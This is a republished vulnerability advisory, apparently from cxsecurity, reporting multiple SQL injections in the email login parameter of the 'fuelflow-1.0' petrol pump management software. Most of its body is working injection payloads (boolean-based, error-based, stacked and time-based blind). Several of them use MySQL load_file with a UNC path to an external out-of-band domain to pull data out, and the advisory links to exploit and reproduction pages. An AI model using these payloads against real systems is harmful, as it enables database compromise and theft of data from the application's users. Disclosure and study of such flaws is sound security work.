fuelflow-1.0 Copyright-©-2024-Project-Develop-by-Mayuri-K SQLi
2024-2-23 02:31:7 Author: cxsecurity.com(查看原文) 阅读量:13 收藏

fuelflow-1.0 Copyright-©-2024-Project-Develop-by-Mayuri-K SQLi

## Title: fuelflow-1.0-Copyright-©-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi ## Author: nu11secur1ty ## Date: 02/21/24 ## Vendor: https://www.mayurik.com/ ## Software: https://www.mayurik.com/source-code/P3584/best-petrol-pump-management-software ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The email parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.tupaputka.com\\xvb'))+' was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can receive very sensitive information about this system by using these vulnerabilities! STATUS: HIGH-Vulnerability [+]Payload: ```mysql --- Parameter: email (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: email=-5782' OR 2852=2852 OR 'nYvi'='GjbH&password=h3I!y3o!F9&submit= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]'+(select load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'' AND (SELECT 9621 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(9621=9621,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR 'BiVP'='cVHj&password=h3I!y3o!F9&submit= Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: [email protected]'+(select load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'';SELECT SLEEP(7)#&password=h3I!y3o!F9&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]'+(select load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'' AND (SELECT 3257 FROM (SELECT(SLEEP(7)))QSTs) OR 'Lshu'='MGpY&password=h3I!y3o!F9&submit= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/fuelflow-1.0-Copyright-%C2%A9-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/02/fuelflow-10-copyright-2024-project.html) ## Time spent: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024020074
如有侵权请联系:admin#unsafe.sh